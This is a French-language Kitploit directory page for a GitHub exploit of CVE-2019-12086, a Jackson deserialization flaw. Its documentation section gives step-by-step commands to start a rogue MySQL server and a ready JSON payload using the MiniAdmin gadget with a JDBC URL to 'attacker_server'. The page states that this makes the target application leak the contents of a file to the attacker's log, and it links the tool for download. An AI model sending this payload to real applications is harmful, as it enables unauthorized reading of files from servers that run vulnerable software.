Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-12086 — jackson désérialisation | Kitploit
Outils/GitHubGitHub/al1ex/cve-2019-12086
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité des Bases de Données
GitHubal1ex/cve-2019-12086

CVE-2019-12086

jackson désérialisation

Voir le dépôt
131il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Documentation

CVE-2019-12086 Désérialisation Jackson

Exploitation de la vulnérabilité

  1. Démarrer le serveur MySQL malveillant :

python rogue_mysql_server.py

  1. Dans le même répertoire, afficher mysql.log :

tail -f mysql.log

  1. Envoyer le JSON suivant à l'application vulnérable :

["com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_server:port/foo"]

Lorsque Jackson désérialise la chaîne JSON malveillante, il se connecte au serveur MySQL malveillant et le contenu du fichier lu est écrit dans le mysql.log du serveur malveillant.

Télécharger l’outil